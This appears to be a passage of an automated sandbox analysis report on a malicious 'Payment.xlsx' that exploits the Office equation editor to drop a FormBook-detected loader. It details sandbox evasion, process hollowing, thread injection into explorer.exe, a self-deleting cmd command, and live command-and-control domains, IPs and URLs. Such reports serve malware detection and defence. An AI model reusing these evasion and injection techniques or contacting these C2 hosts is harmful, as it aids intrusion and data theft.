          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B3FB push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B45C push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00095AFB push eax; iretd
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00094E3F push edx; retf
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00095FF0 push es; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63788106715
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Payment.xlsxStream path 'EncryptedPackage' entropy: 7.99982132167 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2872, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2392Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2768Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 3000Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2892Thread sleep time: -102957s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 3000Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2028Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 102957
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.2182958260.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000008.00000000.2174877263.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B10 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 54.156.162.121 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.5.116.132 80
          Source: C:\Windows\explorer.exeDomain query: www.girlboyfriends.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.147 80
          Source: C:\Windows\explorer.exeDomain query: www.discjockeydelraybeach.com
          Source: C:\Windows\explorer.exeDomain query: www.burundiacademyst.com
          Source: C:\Windows\explorer.exeNetwork Connect: 157.7.107.165 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.210 80
          Source: C:\Windows\explorer.exeNetwork Connect: 108.177.174.182 80
          Source: C:\Windows\explorer.exeDomain query: www.donelys.com
          Source: C:\Windows\explorer.exeDomain query: www.arfjkacsgatfzbazpdth.com
          Source: C:\Windows\explorer.exeDomain query: www.pipienta.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 310000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 404048 Sample: Payment.xlsx Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 14 other signatures 2->62 9 EQNEDT32.EXE 12 2->9         started        14 EXCEL.EXE 38 24 2->14         started        process3 dnsIp4 40 will.kasraz.com 192.3.122.177, 49167, 80 AS-COLOCROSSINGUS United States 9->40 34 C:\Users\user\AppData\Local\...\so[1].exe, PE32 9->34 dropped 36 C:\Users\Public\vbc.exe, PE32 9->36 dropped 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->80 16 vbc.exe 9->16         started        38 C:\Users\user\Desktop\~$Payment.xlsx, data 14->38 dropped file5 signatures6 process7 signatures8 48 Multi AV Scanner detection for dropped file 16->48 50 Machine Learning detection for dropped file 16->50 52 Tries to detect virtualization through RDTSC time measurements 16->52 54 Injects a PE file into a foreign processes 16->54 19 vbc.exe 16->19         started        22 vbc.exe 16->22         started        24 vbc.exe 16->24         started        process9 signatures10 64 Modifies the context of a thread in another process (thread injection) 19->64 66 Maps a DLL or memory area into another process 19->66 68 Sample uses process hollowing technique 19->68 70 Queues an APC in another process (thread injection) 19->70 26 NAPSTAT.EXE 19->26         started        29 explorer.exe 19->29 injected process11 dnsIp12 72 Modifies the context of a thread in another process (thread injection) 26->72 74 Maps a DLL or memory area into another process 26->74 76 Tries to detect virtualization through RDTSC time measurements 26->76 32 cmd.exe 26->32         started        42 www.discjockeydelraybeach.com 108.177.174.182, 49170, 80 LEASEWEB-USA-LAX-11US United States 29->42 44 www.pipienta.com 157.7.107.165, 49174, 80 INTERQGMOInternetIncJP Japan 29->44 46 8 other IPs or domains 29->46 78 System process connects to network (likely due to code injection or exploit) 29->78 signatures13 process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment.xlsx19%VirustotalBrowse
          Payment.xlsx11%ReversingLabsDocument-Office.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe13%ReversingLabsWin32.Dropper.Convagent
          C:\Users\Public\vbc.exe13%ReversingLabsWin32.Dropper.Convagent

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.donelys.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg==0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://www.churchsw.org/church-projector-project0%Avira URL Cloudsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://www.girlboyfriends.com/8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy200%Avira URL Cloudsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.churchsw.org/repository/Bibles/0%Avira URL Cloudsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy200%Avira URL Cloudsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
